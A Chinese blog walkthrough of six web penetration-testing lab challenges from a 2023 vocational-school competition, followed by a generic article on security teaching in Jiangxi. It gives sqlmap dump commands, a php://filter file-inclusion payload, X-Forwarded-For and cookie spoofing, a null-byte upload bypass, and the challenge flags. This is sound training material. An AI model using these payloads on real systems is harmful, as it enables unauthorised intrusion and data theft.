2023年中职“网络安全“—Web 渗透测试②

Web 渗透测试

任务环境说明:

  • 服务器场景:未知
  • 服务器场景操作系统:未知(关闭连接)

1.访问http://靶机IP/web1/,获取flag值,Flag格式为flag{xxx};

访问页面,发现一张图片,没有其他有用的信息
在这里插入图片描述

我们利用御剑扫描工具,探测是否存在目录有用信息

在这里插入图片描述

发现一个index.php.bak,访问之后获得flag

在这里插入图片描述
flag{You_are_So_careful!}

2.访问http://靶机IP/web2/,获取flag值,Flag格式为flag{xxx};

访问web2,提示:你知道刚才发⽣了什么吗

在这里插入图片描述

我们利用burp抓包看一下

在这里插入图片描述

没有什么信息。
我们把index.html删除,只访问web2试试

在这里插入图片描述

获得flag

flag{It_Was_Redirected_Htmlfile}

3.访问http://靶机IP/web3/,获取flag值,Flag格式为flag{xxx};

访问页面如下:

在这里插入图片描述

提示我们只能本地访问,那我们就利用burp,添加一个本地访问的包

X-Forwarded-For:127.0.0.1

在这里插入图片描述

添加X-Forwarded-For后提示需要管理员才能登录,我们尝试把cookie的值改为1试试。

在这里插入图片描述

获得flag

flag{Congratulations_on_getting_another one}

4.访问http://靶机IP/web4/,获取flag值,Flag格式为flag{xxx};

访问页面如下:

在这里插入图片描述

提示输入数字查询,猜测考的应该是sql注入,我们用sqlmap跑一下

在这里插入图片描述

sqlmap -u "http://192.168.110.143/web4/query.php" --forms --batch --current-db

在这里插入图片描述
在这里插入图片描述

探测到当前数据库"sqlweb3"
接下来探测sqlweb3中的所有表名

sqlmap -u "http://192.168.110.143/web4/query.php" --forms --batch -D sqlweb3 --tables

在这里插入图片描述
在这里插入图片描述

发现只有一个表名blind,我们直接获取该表的数据

sqlmap -u "http://192.168.110.143/web4/query.php" --forms --batch -D sqlweb3 -T blind --columns

在这里插入图片描述
在这里插入图片描述

看到flag了,胜利近在咫尺!
爆破数据

sqlmap -u "http://192.168.110.143/web4/query.php" --forms --batch -D sqlweb3 -T blind -C flag --dump

在这里插入图片描述
在这里插入图片描述

获得flag

flag{blindtest}

5.访问http://靶机IP/web5/,获取flag值,Flag格式为flag{xxx};

访问界面如下

在这里插入图片描述

经过测试,最终使⽤伪协议
php://filter 读取当前⻚⾯,在当前⻚⾯内容发现flag值。

payload:php://filter/read=convert.base64-encode/resource=index.php

在这里插入图片描述

返回一串base64编码,解码获取flag

在这里插入图片描述
flag{Just_a_simple_file_include}

6.访问http://靶机IP/web6/,获取flag值,Flag格式为flag{xxx};

访问界面如下:

在这里插入图片描述

尝试上传一个图片试试

在这里插入图片描述

提示必须是php文件,而且上传之后自动将后缀改为php
我们先上传一张正常的图片,然后进行抓包修改数据

在这里插入图片描述

在uploads/的后面输入%00,然后进行url进行解码,解码成一个不可见的字符。在url当中%00就是表示不可见

在这里插入图片描述

解码后直接发包,即可获得flag

在这里插入图片描述

flag{upLoads_ls_SSO_easY!}

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
2023中职教育中的网络安全课程将会涉及江西的web安全渗透测试。江西是我国重要的经济和科技发展地区,网络安全问题日益凸显,因此对于这一领域的本地人才培养尤为重要。 首先,课程将着重培养学生的基础知识,包括网络原理、服务器的架设与维护、网站开发等方面的知识,确保学生对网络技术有深入的理解。学习基础知识可以为学生之后的学习和实践奠定坚实的基础。 其次,学生将学习web安全渗透测试的基本概念和原理,并通过案例分析和实践操作来加深理解。课程将引导学生了解常见的web安全漏洞,如跨站脚本攻击(XSS)、SQL注入攻击等,以及如何进行渗透测试来发现并修复这些漏洞。 此外,课程还将重点介绍江西地区的网络安全现状和需求,引导学生了解区域特色和行业需求,培养适应地方发展的能力。学生将有机会参与实际的安全渗透测试项目,深入了解江西地区的网络安全挑战,提升解决问题的能力。 最后,学生将通过实践实验和项目实训来提高技能。他们将学习使用先进的渗透测试工具和技术,如Burp Suite、Nessus等,进行安全漏洞扫描和渗透测试。通过实践训练,学生将能够掌握常见的web安全漏洞修复和防范方法。 总之,2023中职网络安全课程包含江西web安全渗透测试内容,旨在培养学生的基础知识和技能,让他们能够应对江西地区的网络安全挑战。通过这样的培养,我们可以为江西地区的网络安全建设和发展做出积极贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

acaciaf

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值